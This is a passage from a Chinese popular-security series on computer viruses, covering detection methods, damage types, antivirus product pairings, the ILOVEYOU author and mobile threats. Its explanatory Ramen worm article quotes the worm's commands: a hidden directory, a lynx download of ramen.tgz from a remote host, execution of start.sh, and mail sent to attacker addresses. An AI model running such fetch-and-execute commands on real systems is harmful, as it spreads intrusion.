这种方法遇到下述情况:已有软件版更新、变更口令、修改运行参数、校验和法都会误报警。
校验和法对隐蔽性病毒无效。隐蔽性病毒进驻内存后,会自动剥去染毒程序中的病毒代码,使校验和法受骗,对一个有毒文件算出正常校验和。

运用校验和法查病毒采用三种方式:
①在检测病毒工具中纳入校验和法,对被查的对象文件计算其正常状态的校验和,将校验和值写入被查文件中或检测工具中,而后进行比较。
②在应用程序中,放入校验和法自我检查功能,将文件正常状态的校验和写入文件本身中,每当应用程序启动时,比较现行校验和与原校验和值。实现应用程序的自检测。
③将校验和检查程序常驻内存,每当应用程序开始运行时,自动比较检查应用程序内部或别的文件中预先保存的校验和。

校验和法的优点是:方法简单能发现未知病毒、被查文件的细微变化也能发现。其缺点是:发布通行记录正常态的校验和、会误报警、不能识别病毒名称、不能对付隐蔽型病毒。

行为监测法
利用病毒的特有行为特征性来监测病毒的方法,称为行为监测法。通过对病毒多年的观察、研究,有一些行为是病毒的共同行为,而且比较特殊。在正常程序中,这些行为比较罕见。当程序运行时,监视其行为,如果发现了病毒行为,立即报警。

这些做为监测病毒的行为特征如下:
A.占有INT 13H
所有的引导型病毒,都攻击Boot扇区或主引导扇区。系统启动时,当Boot扇区或主引导扇区获得执行权时,系统刚刚开工。一般引导型病毒都会占用INT 13H功能,因为其他系统功能未设置好,无法利用。引导型病毒占据INT 13H功能,在其中放置病毒所需的代码。
B.改DOS系统为数据区的内存总量
病毒常驻内存后,为了防止DOS系统将其覆盖,必须修改系统内存总量。
C.对COM、EXE文件做写入动作
病毒要感染,必须写COM、EXE文件。
D.病毒程序与宿主程序的切换
染毒程序运行中,先运行病毒,而后执行宿主程序。在两者切换时,有许多特征行为。

行为监测法的长处:可发现未知病毒、可相当准确地预报未知的多数病毒。行为监测法的短处:可能误报警、不能识别病毒名称、实现时有一定难度。

软件模拟法
多态性病毒每次感染都变化其病毒密码,对付这种病毒,特征代码法失效。因为多态性病毒代码实施密码化,而且每次所用密钥不同,把染毒的病毒代码相互比较,也无法找出相同的可能做为特征的稳定代码。虽然行为检测法可以检测多态性病毒,但是在检测出病毒后,因为不知病毒的种类,难于做消毒处理。

计算机病毒小知识速查系列六

计算机病毒的破坏行为

计算机病毒的破坏行为体现了病毒的杀伤能力。病毒破坏行为的激烈程度取决于病毒作者的主观愿望和他所具有的技术能量。数以万计、不断发展扩张的病毒,其破坏行为千奇百怪,不可能穷举其破坏行为,难以做全面的描述。根据有的病毒资料可以把病毒的破坏目标和攻击部位归纳如下:

1.攻击系统数据区,攻击部位包括:
硬盘主引寻扇区、Boot扇区、FAT表、文件目录。一般来说,攻击系统数据区的病毒是恶性病毒,受损的数据不易恢复。

2.攻击文件
病毒对文件的攻击方式很多,可列举如下:删除、改名、替换内容、丢失部分程序代码、内容颠倒、写入时间空白、变碎片、假冒文件、丢失文件簇、丢失数据文件。

3.攻击内存
内存是计算机的重要资源,也是病毒的攻击目标。病毒额外地占用和消耗系统的内存资源,可以导致一些大程序受阻。病毒攻击内存的方式如下:占用大量内存、改变内存总量、禁止分配内存、蚕食内存。

4.干扰系统运行
病毒会干扰系统的正常运行,以此做为自己的破坏行为。此类行为也是花样繁多,可以列举下述诸方式:不执行命令、干扰内部命令的执行、虚假报警、打不开文件、内部栈溢出、占用特殊数据区、换现行盘、时钟倒转、重启动、死机、强制游戏、扰乱串并行口。

5.速度下降
病毒激活时,其内部的时间延迟程序启动。在时钟中纳入了时间的循环计数,迫使计算机空转,计算机速度明显下降。

6.攻击磁盘
攻击磁盘数据、不写盘、写操作变读操作、写盘时丢字节。

7.扰乱屏幕显示
病毒扰乱屏幕显示的方式很多,可列举如下:字符跌落、环绕、倒置、显示前一屏、光标下跌、滚屏、抖动、乱写、吃字符。

8.键盘
病毒干扰键盘操作,已发现有下述方式:响铃、封锁键盘、换字、抹掉缓存区字符、重复、输入紊乱。

9.喇叭
许多病毒运行时,会使计算机的喇叭发出响声。有的病毒作者让病毒演奏旋律优美的世界名曲,在高雅的曲调中去杀戮人们的信息财富。有的病毒作者通过喇叭发出种种声音。已发现的有以下方式:演奏曲子、警笛声、炸弹噪声、鸣叫、咔咔声、嘀嗒声

10.攻击CMOS
在机器的CMOS区中,保存着系统的重要数据。例如系统时钟、磁盘类型、内存容量等,并具有校验和。有的病毒激活时,能够对CMOS区进行写入动作,破坏系统CMOS中的数据。

11.干扰打印机
假报警、间断性打印、更换字符。


计算机病毒小知识速查系列七

计算机病毒的防治策略
计算机病毒的防治要从防毒、查毒、解毒三方面来进行;系统对于计算机病毒的实际防治能力和效果也要从防毒能力、查毒能力和解毒能力三方面来评判。

"防毒"是指根据系统特性,采取相应的系统安全措施预防病毒侵入计算机。"查毒"是指对于确定的环境,能够准确地报出病毒名称,该环境包括,内存、文件、引导区(含主导区)、网络等。"解毒"是指根据不同类型病毒对感染对象的修改,并按照病毒的感染特性所进行的恢复。该恢复过程不能破坏未被病毒修改的内容。感染对象包括:内存、引导区(含主引导区)、可执行文件、文档文件、网络等。

防毒能力是指预防病毒侵入计算机系统的能力。通过采取防毒措施,应可以准确地、实时地监测预警经由光盘、软盘、硬盘不同目录之间、局域网、因特网(包括FTP方式、E-MAIL、HTTP方式)或其它形式的文件下载等多种方式进行的传输;能够在病毒侵入系统是发出警报,记录携带病毒的文件,即时清除其中的病毒;对网络而言,能够向网络管理员发送关于病毒入侵的信息,记录病毒入侵的工作站,必要时还要能够注销工作站,隔离病毒源。

查毒能力是指发现和追踪病毒来源的能力。通过查毒应该能准确地发现计算机系统是否感染有病毒,并准确查找出病毒的来源,并能给出统计报告;查解病毒的能力应由查毒率和误报率来评判。
解毒能力是指从感染对象中清除病毒,恢复被病毒感染前的原始信息的能力;解毒能力应用解毒率来评判。


计算机病毒小知识速查系列八

Ramen是Linux的“病”而非“毒”
  
前一段时间,一些媒体报告:“世界上第一个Linux病毒Reman已经出现”。这引起我极大的兴趣,并想一睹Reman的庐山真面目。但是,当我得到该病毒的有关资料和样本之后发现:Reman并不能严格地称为病毒,它实际上只是一个古老的、在Unix/Linux世界早已存在的“缓冲区溢出”攻击程序。几乎所有Unix/Linux版本中都或多或少地存在这样的问题。第一次此种类型的攻击(Morris Worm)是在十多年前,Reman这种“缓冲区溢出”攻击程序并不是在今天的世界第一次出现。事实上,针对Windows98/NT的缓冲区溢出攻击也是很常见的,且并不被称为病毒。

  缓冲区溢出的原理是:向一个有限空间的缓冲区拷贝了过长的字符串,覆盖相邻的存储单元,从而引起程序运行失败。因为自动变量保存在堆栈当中,当发生缓冲区溢出的时候,存储在堆栈中的函数返回地址也会被覆盖,从而无法从发生溢出的函数正常返回(返回地址往往是一个无效的地址)。在这样的情况下,系统一般报告:“core dump”或 “segment fault”。严重的情况是:如果覆盖缓冲区的是一段精心设计的机器指令序列,它可能通过溢出,改变返回地址,将其指向自己的指令序列,从而改变该程序的正常流程。这段精心设计的指令一般的目的是:“/bin/sh”,所以这段代码被称为“shell code”。通过这样的溢出可以得到一个shell,仅此而已。但是,如果被溢出是一个suid root程序,得到的将是一个root shell。这样,机器的控制权已经易手,此后发生的任何事情都是合理的。

  下面我们回到Reman。它首先对网络上的主机进行扫描,通过两个普通的漏洞进入系统,获取root权限,然后从源主机复制自身,以继续扫描网上其他服务器。对于Red Hat 6.2 来讲,如果攻击成功,它会做以下工作:

  mkdir /usr/src/.poop;cd /usr/src/.poop

  export TERM=vt100

  lynx -source http://FROMADDR:27374 > /usr/src/.poop/ramen.tgz

  cp ramen。tgz /tmp

  gzip -d ramen.tgz;tar -xvf ramen。tar;./start.sh

  echo Eat Your Ramen! | mail -s TOADDR -c gb31337@hotmail.com gb31337@yahoo.com

  很明显,Reman只是一个自动化了的缓冲区溢出程序,而且是很普通的一种。目前缓冲区溢出攻击是非常普遍的一种攻击。黑客网站对各类系统的漏洞的发布几乎每日更新。这种攻击方式并不是不可避免,目前已有很多对付该类攻击的方案。需要指出的是:Reman这样的攻击程序对红旗Linux的攻击是不可能成功的,因为红旗Linux全线产品都考虑了“缓冲区溢出”这样的安全问题。


计算机病毒小知识速查系列九

专家谈计算机病毒高发季节的防护
  4月是计算机病毒的高发季节。通过网络新途径,病毒早已突破了地域界限,飞速传播,预计本月有至少20余种电脑病毒将向我们的电脑发起猛攻,其中尤以4月26日的CIH病毒最为险恶。

  八大“前兆”

  “计算机‘发病’也有预兆,及早注意完全可以避免。”上海市信息办信息安全专家石坚提醒市民注意以下八大“前兆”:计算机经常性出现无缘无故的死机;计算机系统无法正常启动或启动变慢;键盘、显示有异常现象;运行速度明显变慢;以前能正常运行的软件经常发生内存不足的错误;文件的长度、内容、属性和日期等无故改变;经常丢失文件、丢失数据;自动链接到一些陌生网站。“当出现上述情况时,说明您的计算机很可能已经感染了病毒。”“临床”病征石坚还列出了病毒发作时的病症:如“胡言乱语”——提示一些不相干的话,发出一段音乐,产生特定的图像,硬盘灯不断闪烁;“胡搅蛮缠”——突然进行游戏算法,鼠标自己在动,Windows桌面图标乱动,系统自动发送电子邮件。“病情”严重时计算机还会突然死机或重新启动。

  预防“接种”

  市计算机病毒防范服务中心82000热线的专家专为电脑用户开出了春季预防“药方”,共计8味“良药”:个人计算机乃至整个网络都应安装实时防病毒软件,以建立完整的网络防毒架构;及时更新杀毒软件;不要打开任何附件后缀为VBS、CHM、PIF、SCR、SHS的文件,对附件后缀为EXE与COM的文件应先确认再打开;来历不明的邮件最好删除或先用防病毒软件检查;不要隐藏系统中已知文件类型的扩展名;所有主题有“FW:”的信件都要提高警惕;重要资料应作好备份;用户应使用最新版的OutlookExpress安全修补程序或将浏览器设成最高安全性。专家还欢迎市民带着问题参加本周六在上海图书馆知识广场举行的大型咨询活动。


计算机病毒小知识速查系列十

及时升级反病毒软件的利器

      目前有许多电脑病毒发作特点不是快速而猛烈的,而是缓慢而狡猾的,有时还具有使用加密插件自动升级的能力,反病毒专家认为这些发作缓慢的病毒有非同寻常的驻留本领,一旦发作将对计算机更加危险。正是由于病毒的日益增多,因此反病毒软件也得到了大家的欢迎。但现在的病毒能够自动地不断升级,这就要求我们必须及时地对反病毒软件进行升级发展,只有这样才能使计算机更加安全地使用。但对反病毒软件进行升级也不是一件很容易的事情,除了要确保它的时效性外,我们还必须考虑到完成该工作所要的时间,以及由此带来的潜在的危险等因素,因为一点点的时间误差就可能给自己的计算机造成难以弥补的损失。那么我们该如何才能及时准确地升级反病毒软件呢?下面笔者就以McAfee系列的反病毒软件为例,和大家谈谈使用McAfee的ePo策略来在工作中及时完成对反病毒软件的升级工作。

      McAfee ePo是英文McAfee ePolicy Orchestrator的缩写,它是一个与McAfee反病毒软件结合比较紧密的综合型管理工具,该工具一般具有智能组织用户、策略的实时变化、增强的报告、安全的策略管理以及无缝升级反病毒软件等特征,它可以帮助我们及时完成反病毒软件的分配工作,该项功能可以使我们这些普通的网民省却了购买或寻找第三方软件的麻烦,同样也会降低工作中可能存在的安装和升级的复杂性,更重要的一点就是ePo还可以与市面上流行的第三方软件分配工具进行高效协调地工作,另外ePo还能够监控并且改变用户机器的配置,获得状态和事件的增强报告,追踪病毒感染率和纠正行动。

      对于我们远程用户来说,由于ePo是通过安全的http协议进行通信的,这样我们就可以通过因特网或者本地的局域网来远程管理自己的计算机系统,管理时,我们首先与ePo服务器建立连接,一旦与服务器连接成功后,ePo代理会自动连接到服务器并把自上一次通信以来所收集到的所有存储在本地的信息传送到服务器上。另外ePo设计合理的体系结构使得一台ePo服务器能够管理另外的一台和多台ePo服务器,这为ePo生成分组分级的报告打下了良好的基础,同时ePo还具备26个预设报告和无限的定置报告能力,这使得生成的数据报告具有很强的数据加工能力,比起其他软件的记流水帐的做法要强多了。如果病毒发作,ePo能将所有的McAfee反病毒软件设定为全企业的自动更新,启动一个手动扫描,并生成详细报告来查明侵入地点以及确认传播的方式和速度;当然ePo最受用户欢迎的是它支持在线自动更新,利用该功能我们可以花最少的钱和时间来获取及时地升级反病毒软件。

计算机病毒小知识速查系列十一

合理搭配使用杀病毒软件

      面对如今层出不穷的各类杀毒软件,恐怕不单是“菜鸟”们找不着北,连一些“老鸟”也颇感头痛。由于个人机器的性能、用途、习惯、兴趣甚至心态的不同,形成了自己的应用软件搭配风格,但几乎很少有朋友注意到这其中的技巧。

一、使用杀毒软件的几个误区

  很多朋友认为自己的机器里头装了杀毒软件就万事大吉。其实到目前为止,世界上没有一家杀毒软件生产商敢承诺可以查杀所有已知病毒,这就意味着即便你装了杀毒软件,绝非从此就高枕无忧。我所见到的装备了杀毒软件的机器仍然被病毒侵蚀的案例不下10起。所以,在大家防范于未然的同时,合理搭配使用杀毒软件也是必不可少的。 为数不少的朋友总是喜欢下载一大堆最新的却是连自己也不知道如何用的共享杀毒软件,甚至装了又删--直接后果是造成系统和其中某些程序产生冲突,有使系统崩溃的危险;注册表也因此会凌乱、臃肿;系统文件有可能被误删等,威胁着整个系统的安全。

  许多人只注意在Windows系统下按要求安装杀毒软件,却忽略了DOS杀毒盘的重要性。病毒一旦感染了Windows系统应用程序,必须要在DOS下才能杀除。所以,朋友们一定要注意DOS应急盘的保护和更新。
??

二、如何合理搭配使用杀毒软件

  大家都知道同时开启两套杀毒软件的实时监控有可能会引起冲突,但是在机器上安装多套杀毒软件的同时只开启一套杀毒软件的实时监控程序却是行得通的。这样一来,不但可以扬长避短发挥各自软件的优势,而且还可以交叉查杀病毒,极大的增强了机器的安全系数。如果您有条件,极力推荐!

  合理搭配前对各种杀毒软件的特性要有必要的了解。目前的商业杀毒软件分为国产和欧美两大阵营。客观的讲,目前国产杀毒软件的无论是整体功能设计、查杀毒数量等等还是与国际先进水平有一定差距,但国产品牌在价格、服务等方面还是有优势的。这也是国产杀毒软件能占据80%国内市场份额的重要原因。

  在国产品牌中,瑞星对新近出现的流行病毒的查杀效果很明显,但由于其是基于235K的病毒库,所以查杀毒数量始终是瑞星的瓶颈;KV3000对比起KV300有了质的飞跃,对各种病毒具有广泛查杀性,但是其更新速度稍慢,对新病毒的反应也不够快。这正好和瑞星有了互补的可能;金山毒霸和KILL也是各有优势。

  国际品牌里首推McAfee。作为全球拥有7000万用户、号称世界第一品牌的杀毒软件,McAfee的确是做得不错:界面设计精致、合理,程序运行稳定,查杀毒数量在57000种以上。还有一点很重要:McAfee算是国际品牌里头最体贴中国用户的杀毒软件----尽管性能十分出色,但是其对资源的占用率还是在大多数中国用户的承受范围以内。PC-cillin也是一款很大气的杀毒软件,基本性能与McAfee比较类似,但在查杀毒的数量上较为落后。熊猫卫士和诺顿最大的相似之处是它们的实时监控程序占用了巨大的资源,如果您的机器是99年以前配置的话,基本上可以打消去试试这两款软件的念头了。当然,作为享有良好声誉的世界品牌,诺顿的综合实力也是出类拔萃的。熊猫卫士是一款非常好用的软件,哪怕您是头一次坐在电脑面前,您也不会对它有手足无措的感觉。

三、杀毒软件实用搭配方案

  1.McAfee5.13+瑞星。利用McAfee极强的综合实力,发挥其在系统检测、对宏病毒的侦测、E-mail监控、实时监控恶意JAVA和ActiveX控件等方面的优势,加上McAfee本身具有的强大的查杀毒能力,辅之以对国内新流行病毒较为敏感、在DOS下非常易用(全中文界面、支持鼠标)且查杀毒性能很好的瑞星,这样一对组合应该说是非常理想的。经测试,在随系统只启动McAfee实时监控的前提下,建立在Windows98上的这一对组合没有任何冲突。

  2.McAfee5.13+KILL。作为曾是国内杀毒权威认证形象的KILL,其在技术层面上不输于国内任何一家对手,况且CA的技术实力我们应当可以充分信赖。KILL在国内建立的病毒监视小组和CA遍布全球的40多家类似机构应该可以给您充足的安全感。事实上,在随系统开启McAfee实时监控的情况下,病毒入侵这一组合的可能性已经非常小了。经测试,无论是开启KILL还是McAfee的实时监控,都不会与系统发生冲突。

  3.PC-cillin2001+KV3000。这又是一对黄金组合。PC-cillin2001公认的最大优势是其对以网络为载体的病毒和恶意JAVA和ActiveX程序的查杀;而KV3000拥有很好的DOS性能,一旦中招,还可利用KV3000转移阵线,在DOS下再与病毒决一雌雄;还有KVW3000庞大的病毒样板库、优越的实时监控性能也会让您安全感倍增。建议使用KVW3000的实时监控程序。这对组合经过长达4个月的测试,未发现与系统或其他软件冲突。


计算机病毒小知识速查系列十二

“我爱你”病毒创造者自白

  菲律宾辍学生古兹曼(Guzman)因创造了历史上破坏力最强的计算机病毒“我爱你(Love Bug)”而名扬世界。

  他说,“我承认我创造病毒,但我不知道‘我爱你’病毒是不是我创造的病毒之一。”“如果能知道源代码(source code),我可以查查看,也许是别人栽赃陷害,或是从我这里偷走的。”

  24岁的古兹曼明白,在信息时代,名气转瞬即逝。菲律宾一所计算机学校的这名辍学生,想在“我爱你”病毒的恶名还没有被世人遗忘前,让全世界都知道他是一名技术高超的黑客,一名能瘫痪个人计算机的“指挥官”。不过,古兹曼要小心法律制裁。虽然到目前为止“我爱你”是不是他所创造的仍难以下结论,但事实上,从美国国防部到英国国会,几乎所有机构都没有逃脱“我爱你”的毒手,这个病毒瘫痪全球计算机所造成的损失约达100亿美元。在许多国家,古兹曼即使坐一辈子牢也难以洗清其罪名。

  菲律宾当局以盗窃及其它罪名起诉古兹曼,但在去年8月份因证据不足而撤销。古兹曼没有受到法律制裁的另一个原因是“我爱你”病毒在去年5月爆发时,菲律宾还没有制裁计算机黑客行为的相关法规。

  不过,菲律宾总统艾斯特拉达已在去年8月14日签署了电子商务法,古兹曼也陷入了两难境地:一方面他想承认是自己创造了“我爱你”病毒,这样他可以利用这项“荣耀”赚钱,另一方面在接受记者采访时,紧守不承认创造“我爱你”病毒的原则,因为他担心会再次吃上官司。

  在辩护律师的陪同下,古兹曼说,全世界计算机天才多的是,“但我认为我已是菲律宾历史的一部分,不能被抹煞。”

  古兹曼说他已不再非法入侵别人的计算机,但他仍在练习“破译”密码。他说,他使用这种技术从因特网下载软件而不必付费。

  古兹曼并不认为用这种方式偷窃软件是“偷”,就像他对计算机病毒所造成的损害从未在良心上受到谴责一样。他说,软件公司,特别是微软,要为“我爱你”所产生的灾难负责,因为他们在知情的情况下销售易遭攻击的产品。

  古兹曼说,“我是消费者,我购买这种产品,只是我的使用方式有问题或不恰当,但这都是我自己的事,为什么要指责我?”

  业内人士指出,这种与道德无关的论调是计算机黑客的典型反应,不管他们是住在鳞次栉比的马尼拉住宅区,还是硅谷高级住宅区。

  事实上,仅仅在2000年春天以前,古兹曼还是个泛泛之辈,为获得技术学院的计算机学位而苦苦挣扎。5月4日,一封名为“我爱你”的电子邮件突然出现在亚洲的计算机上,只要一打开,就会销毁图形及其它文档。这个电子邮件程序会通过计算机中的数据库自我复制,迅速传送给地址簿中所有的联络人。不过数小时,欧美地区从新闻工作者、经纪商到政府机关无一幸免。

  古兹曼回忆说,当时他在家睡觉,当他醒来听到这一新闻时,一点都没有觉得与自己有关。

  马尼拉一下子成了全球追捕病毒作者的重点地区。经过一番追查后,警方证实古兹曼是头号嫌疑犯。一开始,古兹曼说他可能在无意间释放出了病毒;但现在,他说他不知道病毒是怎么跑出去的。

  在被当成嫌疑犯后,古兹曼有好几个礼拜躲在他母亲家。几次冒险跑出来,发现大家对他指指点点后,便开始整天窝在家里的沙发上,玩索尼推出的Play station。

  因为发生了这一事件,古兹曼在求职时,一度令计算机公司闻之色变。现在风头已过,古兹曼终于找到了一份工作。他说,微软的Outlook软件是传播病毒的主要工具之一,如果微软提供不错的条件,他愿为微软工作。


计算机病毒小知识速查系列十三

短消息接收也会传播手机病毒

  横行互联网的计算机病毒下一个入侵目标是手机和移动上网设备(PDA),最终侵入上网电视和其他上网家电。这是亚洲反病毒大会(AVAR)昨天透露的信息。昨天是AVAR的最后一天,会议重点讨论了计算机病毒的未来发展趋势和应对策略。与会者普遍关注手机病毒的发展进程和解决方案,目前,已出现通过短信息发布来传播病毒的手机概念病毒。所谓概念病毒是指已经实现潜伏、传播、感染和破坏等病毒特性的病毒雏形。一旦用户接收到带有病毒的短信息,阅读后便会出现手机键盘被锁死的现象,以后可能出现破坏手机内存储的信息,直至彻底破坏手机IC卡等恶性手机病毒。  

  应对手机病毒目前主要的技术措施有两种:其一是通过无线网站对手机进行杀毒;其二是通过手机的IC接入口或红外传输口进行杀毒。另据了解,应AVAR协会的邀请,中国专业反病毒公司北京瑞星公司正式成为AVAR协会会员,这是我国拥有完全自有知识产权的反病毒公司第一次加入国际性的反病毒组织。


计算机病毒小知识速查系列十四

专家警告新病毒无WAP不摧

  澳大利亚一家互联网安全机构日前警告说,病毒高手很有可能正在编写一种妨碍新一代手机正常工作的病毒,这种病毒将以WAP技术为破坏目标,使手机用户在接受上网服务时产生麻烦。

  这一由澳大利亚电脑紧急反应小组发出的警告源自一份在澳大利亚国内流行的恶作剧电子邮件,这份电子邮件谎称目前一种手机病毒正在传播,它可以妨碍用户接入网络,而且可以通过贮存在手机内的电话薄传播给他人的手机。

  对此位于澳大利亚昆士兰大学的小组发言人马克-麦克帕森指出:“尽管没有迹象表明大规模的手机病毒将要爆发,但我们认为黑客在新兴的无线手机领域编写新的病毒一点也不令人奇怪。”

  据悉目前针对掌上电脑的病毒已于今年早些时间被发现,这种病毒在用户利用掌上电脑玩任天堂游戏时被启动,它能够破坏掌上电脑所存贮的数据。9月份,一种名为Phage的掌上电脑病毒也悄然露面,它具有更大的破坏性,可在程序之间传播也可通过用户共享软件中传播给其它的掌上电脑。


计算机病毒小知识速查系列十五

您的PDA需要反病毒软件保护吗?

??说起计算机病毒和反病毒之间的斗争,很多朋友都会认为那只有台式计算机和便携式笔记本电脑才会感染计算机病毒。确实如此,传统的计算机病毒主要寄生和感染台式PC机,或者通过INTERNET来传播。很少人听说PDA(个人数字助理)这样的手持式的无线通讯数字产品也会受到计算机病毒的威胁。
??但目前随着PDA和WAP的飞速发展,计算机专家正在进行PDA是否正在受到病毒威胁和是否需要特别的反病毒软件来保护的问题。专家认为,PDA由于经常需要和台式PC机进行资料同步交换,而PC机上的Word 或 Excel 文档很容易感染宏病毒。如果是在大公司的局域网里,这种现象更为严重。局域网中只要有一台计算机感染计算机病毒,那么整个网络都将十分的危险。PDA使用的操作系统比如WINDWOS CE是和普通台式PC机基本上有着同样的数据处理能力。而专门为PDA设计的应用软件中亦有能处理EXCEL或WORD文档的功能。这意味着PDA只要和感染病毒的台式PC机进行资料同步,那么PDA很可能就和PC机一样受到病毒的感染,甚至病毒会在PDA中发作。所以有专家形象的把感染病毒的PDA比喻成“一张塞在PC机软驱里的感染病毒的软磁盘”。“一个在公司局域网里流动的炸弹”。由此可见,PDA正在受到病毒的威胁,保护PDA的数据安全已经是一个十分重要的问题。
??幸运的是,国际著名的反病毒软件公司Network Associates已经于8月21日宣布推出基于保护PDA的新型防病毒软件。这种新型的防病毒软件被成为McAfee VirusScan Handheld。根据Network Associates的资料表明,McAfee VirusScan Handheld主要是用于个人数字助理PDA和其他手持式电脑的安全防护,McAfee VirusScan Handheld是为了帮助大公司处理和保护日益增长的数字移动用户的数字产品的数据安全而设计的。
??McAfee VirusScan Handheld是一个应用软件,它能安装在用户的台式PC机和与其交换资料的PDA上。McAfee VirusScan Handheld的反病毒原理基本上和传统的McAfee VirusScan 一样,通过扫描,监视台式PC机和PDA的资料同步来判断电脑是否感染病毒。也可以作为台式PC机向PDA传送资料的病毒过滤器。McAfee VirusScan Handheld能对付各种已知的规则的文件类型,一般计算机病毒经常感染寄生的文件都能被McAfee VirusScan Handheld检测。


计算机病毒小知识速查系列十六

新病毒时代

  与新经济学家相比,病毒更有理由成为网络时代的宠儿,这是因为:第一,病毒具有更强的表现欲和活动能力;第二,事实证明,病毒能更好地实践互联网速度,从而更加有效地利用整个互联网。

  用户:都是网络惹的祸

  令人胆战心惊的病毒警报最近再度响起,对象是那些借网络之风日渐流行的掌上电脑。与前一阵沸沸扬扬的手机病毒不同,这一次不再是纸上谈兵,据称,不少用户已经遭遇到了这种被称为Palm.Liberty.A的病毒,趋势科技等公司先后在网上公布了程序代码,让用户及时下载,以查杀这一全新病毒。Palm.Liberty.A病毒的出现,标志着我们迈入一个全新的病毒时代。

  一切光荣归于互联网,一切危害也来自于它。网络对于病毒是如此的钟爱,让我们先来看看下面这一组数字:1999年上半年,通过Internet传播的四种病毒(happy99、CIH、Melissa、ZIP-explorer)造成了76亿美元的巨额损失。这一数字是此前4年所有病毒造成损失的总额。然而这并不算什么,病毒总是喜欢挑战自我,一句“ILOVEYOU”横扫互联网,在短短的数天之内,爱虫自己就创下了65亿美元损失的空前纪录。

  病毒是寄生于速度的物种,只有速度才能赋予它巨大的能量,因此,网络理所当然地成为了病毒的最佳伴侣。在CIH病毒之前,笔者很少为媒体上炒得热热闹闹的病毒发愁,因为那时主要的传播介质就是软盘,即使是流行病毒,从国外传进国内一般也需要几个月的时间。而且,只要用户记住在使用软盘时,先进行病毒扫描,就可以在很大的程度上避免病毒的感染。

  现在,网络使病毒得到了前所未有的进化,生出翅膀的病毒迫不及待地向人们展示,什么才是互联网的速度。还记得那个“Melissa”吗,这个“小姑娘”在病毒家族中率先完成了自己的“互联网转型”。1999年3月26日,Melissa从制作者的电脑出发,短短的17个小时之内,在300多家企业,至少10万台电脑上留下了自己的足迹。不过,后来出现的爱虫病毒很快使得这一成绩黯然失色。

  在运动中破坏,在运动中繁殖。这就是病毒生存的哲理。1999年以前,全球病毒总数约18000种,而2000年还未过完,这一数字已经突破40000种。当时的爱虫病毒,就曾经在一天之内,产生了数十个变种。在您阅读本文的时候,可能又有一群病毒爬上了网络,开始了它们的速度之旅。

  当病毒爱上网络,我们又能做些什么呢?

  反毒公司:你是风儿,我是沙.....

  “你是风儿,我是沙,缠缠绵绵到天涯......”。这句歌词是病毒和反毒公司之间关系的最好诠释。病毒恨反病毒公司吗?是的。反病毒公司爱病毒吗?答案同样是肯定的。如果说网络与病毒是最亲密的伴侣,那么病毒与反病毒公司就是一对欢喜冤家。

  有了病毒,才有了反毒公司腰袋中鼓鼓的钞票。借助病毒的“恐吓”,反毒软件McAfee的股票首日上市就上涨了三倍,从那些被病毒吓得心惊肉跳的用户手中,共“敲诈”到了20.4亿美金。这次掌上电脑病毒的出现,更是使各大反毒厂商兴奋不已,透过这只病毒,厂商们看到了一个远未开发的巨大金矿,那就是掌上设备与信息家电的安全防护。各厂商争先恐后地推出自己的解决方案,惟恐在这块新兴的市场上落后一步。

  病毒肆虐之时,正是反毒厂商大发横财的日子,这听起来让人颇感别扭,难怪有人甚至怀疑,不少病毒就是那些反毒公司制造的。但凭心而论,用户与反病毒软件公司的关系,就像病人与医生的关系,医生不能为了利益希望别人多生病,病人也不能因为付出了金钱就产生怨恨。在网络时代,医生与病人这种关系,更应该由于病毒的猖獗而紧密相连。为了追逐病毒越来越快的脚步,反毒公司也别无选择地爱上了网络。通过互联网,各公司的反病毒中心可以以最快的速度,对全球范围内新出现的病毒做出反映。此外,通过收取会员费的方式,在互联网上提供反毒服务,也成为反毒公司的一条财路。以McAfee为例,它的网站向会员收取49.95美元的年费。不到三个月的时间,登记为会员的用户就达到了12,800名,他们来自世界230个国家。网络造就了全球化的病毒,网络也造就了全球化的反毒公司。

  病毒爱上网络,反病毒公司也爱上了它,随着网络的不断发展,这一对冤家的恩爱厮杀就演绎出了全新的病毒时代。

  病毒:我的明天更美好

  对未来的世界,你会有什么样的想象呢?也许一切已经被媒体描绘得令人向往:在家中,你悠闲地躺在沙发上,观看宽带互动电视。没有什么家务事让你操心,屋里的一切都是可以上网的智能化产品,从冰箱、烤面包机到你脚下穿的球鞋。出门时,乘坐的汽车具有卫星导航系统和多媒体互动装置,在车上,你可以随时浏览新闻,收取Email。至于那些恼人的机械故障,你完全不必担心,车上配备的智能系统会把一切微小的故障在发生前通知修理站,在你毫不查觉的情况下,所有问题都被解决得干干净净。

  但在这幅高科技描绘的美好图画中,还缺少了一样东西,那就是病毒。它是网络名副其实的亲密爱人,我们越接近网络,就越有机会碰上它的身影,当我们完全陷入网络之中时,病毒甚至是致命的。这绝不是危言耸听,试想一下,在你驾驶的途中,汽车的智能系统突然因为病毒失灵会造成什么样的后果?

当然,过度的恐惧也是不必要的,从目前出现的病毒来看,大多数只是通过PC作用于信息设备,而不是直接感染它们,换句话说,它们的寄生与传播,主要还是依赖于PC操作系统。基于现在的技术水平,谈纯粹的手机和信息电器的病毒还为时过早。不过,专家们也指出,天真地以为这类情况不会发生的态度无疑也是错误的。从理论上讲,任何具备内存并且依赖软件代码运作的设备都有可能成为恶意攻击的目标。

  以这次的Palm掌上电脑病毒为例,该程序据称实际上是Palm公司的瑞典程序员Aaron为了检测设备而开发的。据他介绍,此程序的主要用途是对Palm手持设备进行初始化的工具。在接受国外媒体电话采访中,他说:“我开发了一个叫‘清洁工’的Palm程序。该程序能够找出过时的数据库并清除他们,目的是重新恢复一个干净的环境”。但现在,该程序被改成了一个典型的特洛伊木马,并被装扮成“掌上型游戏软件”供人下载,同时以该游戏Crack1.1版本之名,经由“网络接力聊天”系统传播。此病毒软件发作时,掌上电脑内的所有档案将被抹掉。

  为了吸引用户,厂家围绕信息设备的应用竭尽心智,新产品深入到人们饮食起居的每个环节,但安全性却常常被忽略。由于这些设备大多数都是基于软件的智能产品,而且可随时通过网络升级,这无疑给病毒的侵入造成了绝佳的机会。NetworkSecurityTechnologies的高级工程师Smith评价说:“当高级的应用使用低级的安全控制,那么什么可怕的事情都可能发生。可以确信,不远的将来,PC将决不是唯一受到病毒攻击的目标。”

  “明天将更加美好。”病毒这样想,反毒公司也这样想。但是我们呢?



计算机病毒小知识速查系列十七

选择防病毒系统的七点注意

      如何选择一个好的防病毒系统是许多人困惑的,这里我们就以NAI公司的McAfee AVD (Active Virus Defense)网络防病毒系统为例进行讨论。

  注意一,产品体系要完整、检测率要高
